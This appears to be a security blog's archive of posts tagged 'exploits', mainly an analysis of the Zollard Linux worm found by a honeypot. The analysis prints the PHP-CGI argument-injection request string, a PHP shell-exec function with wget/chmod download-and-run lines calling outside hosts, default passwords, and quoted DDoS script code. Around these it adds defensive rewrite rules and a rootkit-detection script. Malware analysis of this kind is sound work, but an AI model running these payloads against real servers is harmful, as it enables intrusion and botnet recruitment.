Posts Tagged ‘exploits’

linux binary

Tuesday, November 12th, 2013

Recently my nepenthes stopped working. Looking into the last log lines I found a wget line:

[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)

So I took a look at this binary, which I could download from this location.

# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Next step: try “strings”. At first nothing new, but then I saw:

/proc/self/exe
POST
?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
<?php
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);

What the heck..? And who is “zollard”?


#### Update  ####

The POST part decodes to:

?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

###############

Further on:

function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
myshellexec("wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");

Now the binary loads another binary, executes it and starts a webserver?

myshellexec("wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd

A few lines further on: it installs “iptables”, drops every telnet connection and starts its own telnet daemon:

insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd

In the end the program destroys its sources (rm -rf) and runs in

mkdir -p
/var/run/.zollard/

The last lines:

chmod +x
cp /bin/sh
1234
12345
dreambox
smcadmin
stemroot
0!0
SHA1

So it ends up with some kind of crypto..

VirusTotal shows a hit rate of 2 out of 47, well, it is no Windows binary..

Anyone seen this before? Who is zollard? Where did the binary get the necessary root credentials from? I guess I have to take a further look..

###

Update

There were quite a lot of download attempts today:

# grep gpharma nepenthes.log | wc -l
33348

which stem from log lines like:

[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)

#### Update 2 ####

I executed the script on a Linux VMware guest after adding “o+x” rights to the binary.

The iptables lines generate errors:

error inserting … ip_tables.ko – Unknown symbol in module

Immediately the machine starts exchanging traffic with 117.201.16.108:58455 and also starts listening on port 58455.

Looks like my machine started scanning the IP range 117.201.16.* on that port, and I receive answers from there… No httpd or telnetd daemons are listening according to “ps”, which I had expected.

The command “pstree” shows an httpd, though! Several children are running; the last one has a connection to 117.201.18.22..23..24.. Looks like the “ps” executable has been changed.

Will see what else can be found. Now it is “St. Martin” time..:-)
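A quick way to settle the “ps” question is to compare what the kernel reports under /proc with what the ps binary prints, and to read listening sockets straight out of /proc/net/tcp instead of trusting netstat. The Python below is an added example, not from this post: the /proc/net/tcp excerpt it embeds is constructed (with a listener on port 58455 like the one observed above), and the ps -eo pid= call assumes a procps-style ps.

```python
import os
import subprocess

# Constructed /proc/net/tcp excerpt: listener on 0.0.0.0:58455 (0xE457), sshd on 127.0.0.1:22, one ESTABLISHED row to skip.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:E457 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 31337 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   2: 0100007F:E457 6C10C975:0050 01 00000000:00000000 00:00000000 00000000     0        0 22222 1 0000000000000000 20 4 0 10 -1
"""

def proc_pids():
    """PIDs according to the kernel; a replaced ps binary cannot hide these."""
    return {int(d) for d in os.listdir("/proc") if d.isdigit()}

def ps_pids():
    """PIDs according to whatever ps is first in PATH (the suspect binary)."""
    out = subprocess.run(["ps", "-eo", "pid="], capture_output=True, text=True, check=True).stdout
    return {int(tok) for tok in out.split()}

def hidden_pids(before, listed, after):
    """PIDs seen in /proc both before and after ps ran, but absent from ps.
    Sampling twice drops short-lived processes, the ps child included."""
    return sorted((before & after) - listed)

def parse_proc_net_tcp(text):
    """(ip, port) for every LISTEN socket (state 0A) in /proc/net/tcp text."""
    listeners = []
    for line in text.splitlines()[1:]:            # skip the header line
        fields = line.split()
        if len(fields) < 4 or fields[3] != "0A":
            continue
        hexip, hexport = fields[1].split(":")
        # local_address is hex, IPv4 stored little-endian: 0100007F = 127.0.0.1
        octets = [str(int(hexip[i:i + 2], 16)) for i in (6, 4, 2, 0)]
        listeners.append((".".join(octets), int(hexport, 16)))
    return listeners

def audit():
    """Kernel truth vs. userland tools: (pids hidden from ps, listeners)."""
    before = proc_pids()
    listed = ps_pids()
    after = proc_pids()
    with open("/proc/net/tcp") as f:
        listeners = parse_proc_net_tcp(f.read())
    return hidden_pids(before, listed, after), listeners

if __name__ == "__main__":
    hidden, listeners = audit()
    print("pids hidden from ps:", hidden)
    print("listening sockets:", listeners)
```

A PID that shows up as hidden can then be inspected via /proc/PID/comm and /proc/PID/exe without touching the suspect ps at all.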


DDoS PHP-Script

Tuesday, December 18th, 2012

Just recently the BSI warned about an ongoing attack on US banks.
The PHP script involved showed a “404” error when called without any arguments.

A closer look shows a “404 Not Foun derror”, WITH the typo in it.
Now we have a neat string to search for in Google or wherever..
and bingo: some other victim already posted the source code
of the infected webserver:

Here we can see that a POST action “stop” makes the DDoS go away..


function stoped()
{
@unlink($base."stmdu.php");
@unlink($base."stp.hp");
cmdexec("killall ping;");
print "Stop & Clean";
}

And here is where the typo sits:


if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
print "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server

Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request

";
die();
exit();
}


good website

Thursday, September 27th, 2012

Found an interesting website dealing with malware-analysis:

http://websiteanalystsresource.wordpress.com/

Seems like a good source for information.

php-bug

Friday, May 4th, 2012

If you run PHP in CGI mode you are probably vulnerable to a newly found bug:
Heise: Gefahr-durch-offene-PHP-Luecke
Adding parameters like http://localhost/index.php?-s to a URL can show the source code or even inject or run parameters in the shell.

Until an update exists it might be wise to filter out some string elements (like a “-” without an “=”):
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]

bind 9 *again* vulnerable

Thursday, November 17th, 2011

Shortly after the last remote DoS vulnerability of bind 9, ISC announced another possibility to crash a server (this time only on recursive resolvers). See CVE-2011-4313 for more info.

Beef

Saturday, May 8th, 2010

At the last meeting of the AK Sicherheit (ECO Verband) we could see a live demo
of the tool Beef (Browser Exploitation Framework). Nice to see that XSS attacks
(cross-site scripting) are not only a nice pop-up window but indeed a real attack
vector for anyone.
Try it yourself, the software can be downloaded from www.bindshell.net

Nikto

Wednesday, October 21st, 2009

A post in Full Disclosure reminded me of Nikto,
a security tool for web services. Based on libwhisker it tests a whole lot of possible bugs
in a webserver/application. Works nicely .. just wondering why it says spamversand.de runs on Microsoft IIS 5/0 ..?